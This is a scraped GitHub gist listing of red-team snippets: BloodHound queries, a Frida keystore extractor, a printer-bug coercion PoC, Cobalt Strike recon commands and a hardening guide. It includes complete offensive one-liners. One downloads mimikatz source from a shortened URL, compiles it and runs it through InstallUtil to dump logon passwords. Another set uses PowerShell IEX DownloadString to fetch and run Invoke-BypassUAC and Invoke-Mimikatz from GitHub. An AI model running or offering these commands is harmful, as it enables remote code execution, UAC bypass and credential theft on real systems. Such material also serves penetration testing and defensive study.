Skip to content

Instantly share code, notes, and snippets.

View filipesam's full-sized avatar

filipesam

20 followers · 66 following
View GitHub Profile
@seajaysec
seajaysec / customqueries.json
Last active February 12, 2025 16:58
bloodhound custom queries
{
"queries": [{
"name": "List all owned users",
"queryList": [{
"final": true,
"query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
}]
},
{
"name": "List all owned computers",
@ajxchapman
ajxchapman / README.md
Created January 15, 2019 22:41
Linux Gateway with WPAD and PAC

Linux Gateway with WPAD and PAC

Simple setup to create a Linux gateway on Ubuntu 18.04 that provides WPAD settings via DHCP option 252.

systemctl disable systemd-resolved.service
systemctl stop systemd-resolved
apt update
apt install dnsmasq
unlink /etc/resolv.conf
echo "nameserver 8.8.8.8" > /etc/resolv.conf
@ceres-c
ceres-c / frida-extract-keystore.py
Last active December 7, 2024 15:26
Automatically extract KeyStore objects and relative password from Android applications with Frida - Read more: https://ceres-c.it/2018/12/16/frida-android-keystore/
#!/usr/bin/python3
'''
author: ceres-c
usage: ./frida-extract-keystore.py
Once the keystore(s) have been exported you have to convert them to PKCS12 using keytool
'''
import frida, sys, time
@haproxytechblog
haproxytechblog / blog20180913-01.cfg
Last active June 14, 2022 14:21
Introduction to HAProxy ACLs
acl is_static path -i -m beg /static/
@jeffmcjunkin
jeffmcjunkin / gist:7b4a67bb7dd0cfbfbd83768f3aa6eb12
Last active January 27, 2025 07:01
Useful Cypher queries for BloodHound
MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer
RETURN u.name
That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
---------------
MATCH
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
WITH
U.name as n,
@3xocyte
3xocyte / dementor.py
Last active February 25, 2025 00:20
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@HarmJ0y
HarmJ0y / cobaltstrike_sa.txt
Created September 28, 2018 22:22
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@7MinSec
7MinSec / lowhanging.md
Last active June 9, 2022 13:15
Low-hanging hacker fruit (and how to remove it)

Low Hanging Hacker Fruit

This gist focuses on (relatively) free and (relatively) easy things organizations can do to better protect their networks without buying yet another black box with blinking lights.

Got some ideas of your own that should be on this list? Please leave a comment below!

Implementing a stronger AD password policy

Microsoft has a great paper on the topic that gives some nice high level recommendations:

  • Use a unique password per site
  • Enable complexity
@xillwillx
xillwillx / katz.cmd
Last active December 17, 2023 06:29
mimikatz.cs one-liner
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*
@jivoi
jivoi / RedTeam_CheatSheet.ps1
Created July 14, 2018 14:52 — forked from m8sec/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands